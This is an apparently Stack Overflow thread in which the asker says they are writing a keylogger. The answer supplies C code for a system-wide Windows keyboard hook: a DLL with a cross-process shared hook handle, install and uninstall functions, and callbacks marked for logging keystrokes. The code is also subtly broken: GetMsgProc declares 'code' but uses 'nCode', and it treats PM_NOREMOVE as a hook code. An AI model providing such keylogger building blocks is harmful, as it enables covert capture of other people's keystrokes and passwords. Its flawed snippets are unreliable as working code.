So I am trying to make a keylogger and so obviously I need to get the last character that was entered in order to do this. So far I have been trying to use SetWindowsHookEx() but that hasnt been working, I made the callback function and everything can anyone help me out with this? Any help is appreciated
Asked
Active
Viewed 616 times
0
-
http://stackoverflow.com/questions/6897058/runtime-keypress-detection-in-a-console-application – Santosh Dhanawade Sep 23 '16 at 11:07
-
that didnt help me at all – sharpchain Sep 23 '16 at 21:47
1 Answers
0
You are on a right track with SetWindowsHookEx. You can use either one of WH_GETMESSAGE, WH_MSGFILTER, WH_KEYBOARD or WH_KEYBOARD_LL depends on which one suits your needs. The WH_KEYBOARD hook will call your callback function whenever there is a WM_KEYDOWN or WM_KEYUP message sent to the hooked window. The WH_KEYBOARD_LL hook will invoke your callback before the async key state is changed. You can take a look here: https://msdn.microsoft.com/en-us/library/windows/desktop/ms644984(v=vs.85).aspx and https://msdn.microsoft.com/en-us/library/windows/desktop/ms644985(v=vs.85).aspx
You need to create a system wide hook, that's why you need to implement your callback function into a dll. Inside the dll you can have the follwing:
#pragma data_seg (".HookSection")
HHOOK hHook = NULL;
#pragma data_seg ()
#pragma comment(linker,"/SECTION:.HookSection,RWS")
HINSTANCE hDLL = NULL;
InstallHook()
{
hHook = SetWindowsHookEx(WH_KEYBOARD, HookProc, hDLL, 0);
}
UninstallHook()
{
UnhookWindowsHookEx( hHook );
}
Pay attention to how the hHook has been defined as a shared variable between processes. The hDll is the dll hInstance that you receive in DllMain function.
Your callback function for WH_KEYBOARD hook could be defined as follows:
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
if (nCode < 0) // do not process message
return CallNextHookEx(hHook, nCode,
wParam, lParam);
// The wParam is the Virtual Key code of the button being pressed or released.
// You can use it for your logging purposes
// In order to determine if the key was pressed or released you need to examine the lParam bits as described here: https://msdn.microsoft.com/en-us/library/windows/desktop/ms644984(v=vs.85).aspx
// If you need to check the state of Shift, Alt, Ctrl then you need to use GetAsyncKeyState function
return CallNextHookEx(hHook, nCode, wParam, lParam);
}
The next step is to create an exe (could be a console app). That will call the InstallHook and UninstallHook functions when you need to start/stop logging.
I gave you an example with WH_KEYBOARD, but you can also try with WH_GETMESSAGE or WH_MSGFILTER hook. In the case of WH_GETMESSAGE the callback should be defined like this:
LRESULT CALLBACK GetMsgProc(_In_ int code, _In_ WPARAM wParam, _In_ LPARAM lParam)
{
if (nCode < 0) // do not process message
return CallNextHookEx(hHook, nCode, wParam, lParam);
switch (nCode)
{
case HC_ACTION:
// You can examine the lParam by casting it to PMSG, like this:
PMSG p = (PMSG)lParam;
// If p->message is WM_KEYDOWN
// the virtual keycode will be written in p->wParam
// If you need to check the state of Shift, Alt, Ctrl then you need to use GetAsyncKeyState function
break;
case PM_NOREMOVE:
break;
default:
break;
}
//
return CallNextHookEx(hHook, nCode, wParam, lParam);
}
VuVirt
- 1,887
- 11
- 13